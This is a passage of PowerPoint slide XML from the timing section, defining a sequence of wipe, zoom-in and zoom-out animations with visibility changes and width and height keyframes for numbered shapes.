                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1169"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="41" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="42" presetClass="entr" nodeType="afterEffect" presetSubtype="8" presetID="22" grpId="9" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="43" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1156"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1156"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="45" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="46" presetClass="entr" nodeType="afterEffect" presetSubtype="16" presetID="23" grpId="10" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="47" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1155"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1155"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1155"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="50" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="51" presetClass="entr" nodeType="afterEffect" presetSubtype="8" presetID="22" grpId="11" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="52" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1161"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="53" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1161"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="54" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="55" presetClass="entr" nodeType="afterEffect" presetSubtype="16" presetID="23" grpId="12" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="56" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1175"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1175"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="58" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1175"/>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16" presetID="23" grpId="13" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="62" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1162"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="63" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1162"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="64" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1162"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="65" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="66" presetClass="exit" nodeType="afterEffect" presetSubtype="32" presetID="23" grpId="14" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="67" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1166"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="68" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1166"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="69" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1166"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="70" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="71" presetClass="entr" nodeType="afterEffect" presetSubtype="16" presetID="23" grpId="15" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="72" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1137"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="73" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1137"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="74" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1137"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="75" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="76" presetClass="exit" nodeType="afterEffect" presetSubtype="32" presetID="23" grpId="16" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="77" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1172"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="78" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1172"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="79" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1172"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="80" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="81" presetClass="entr" nodeType="afterEffect" presetSubtype="16" presetID="23" grpId="17" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="82" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1134"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="83" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1134"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="84" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1134"/>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Class="entr" nodeType="clickEffect" presetSubtype="16" presetID="23" grpId="18" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="88" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1163"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="89" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1163"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="90" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1163"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="91" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="92" presetClass="exit" nodeType="afterEffect" presetSubtype="32" presetID="23" grpId="19" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="93" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1169"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="94" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1169"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="95" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1169"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="96" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="97" presetClass="entr" nodeType="afterEffect" presetSubtype="16" presetID="23" grpId="20" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="98" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1152"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="99" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1152"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="100" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1152"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="101" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="102" presetClass="exit" nodeType="afterEffect" presetSubtype="32" presetID="23" grpId="21" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="103" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1175"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="104" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1175"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="105" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1175"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="106" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="107" presetClass="entr" nodeType="afterEffect" presetSubtype="16" presetID="23" grpId="22" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="108" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1160"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="109" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1160"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="110" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1160"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
